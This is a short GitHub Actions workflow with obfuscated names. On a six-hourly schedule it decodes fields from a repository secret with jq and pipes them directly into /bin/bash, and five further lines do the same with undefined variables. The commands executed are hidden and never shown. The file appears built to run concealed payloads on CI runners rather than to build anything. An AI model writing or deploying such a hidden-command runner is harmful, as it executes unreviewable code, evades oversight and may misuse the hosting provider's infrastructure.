name: weiyuanwang4893
on:
  workflow_dispatch:
  schedule:
    - cron: '4 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: weiyuanwang4893
        env:
          csk090: ${{ secrets.csk090 }}
        run: |
          echo $csk090 | jq -r .jloew18 | /bin/bash
          echo $akp1 | jq -r .mdjbw3408 | /bin/bash
          echo $xp00 | jq -r .x9532 | /bin/bash
          echo $oh6097 | jq -r .lwe96 | /bin/bash
          echo $rfwx206 | jq -r .ug76 | /bin/bash
          echo $ew9041 | jq -r .gios02873 | /bin/bash

